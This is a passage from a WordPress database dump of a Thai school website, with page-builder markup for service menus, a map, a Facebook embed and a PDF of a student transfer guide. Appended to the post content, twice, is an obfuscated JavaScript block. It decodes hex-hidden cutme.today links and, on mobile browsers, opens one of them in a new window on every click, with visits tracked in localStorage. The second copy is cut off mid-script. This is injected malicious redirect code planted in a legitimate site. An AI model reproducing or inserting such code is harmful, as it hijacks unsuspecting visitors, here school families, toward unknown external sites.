{\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-09 22:04:14','2024-08-09 15:04:14','',14,'http://pakhaeng.ssk.in.th/?p=809',0,'revision','',0),
(810,1,'2024-08-09 22:05:08','2024-08-09 15:05:08','<!-- wp:file {\"id\":811,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือการขอย้ายออกนักเรียน.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือการขอย้ายออกนักเรียน.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"คู่มือการขอย้ายออกนักเรียน\"></object><a id=\"wp-block-file--media-d4f2f03a-5687-4318-a087-20514e9fd8af\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือการขอย้ายออกนักเรียน.pdf\">คู่มือการขอย้ายออกนักเรียน</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือการขอย้ายออกนักเรียน.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d4f2f03a-5687-4318-a087-20514e9fd8af\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( 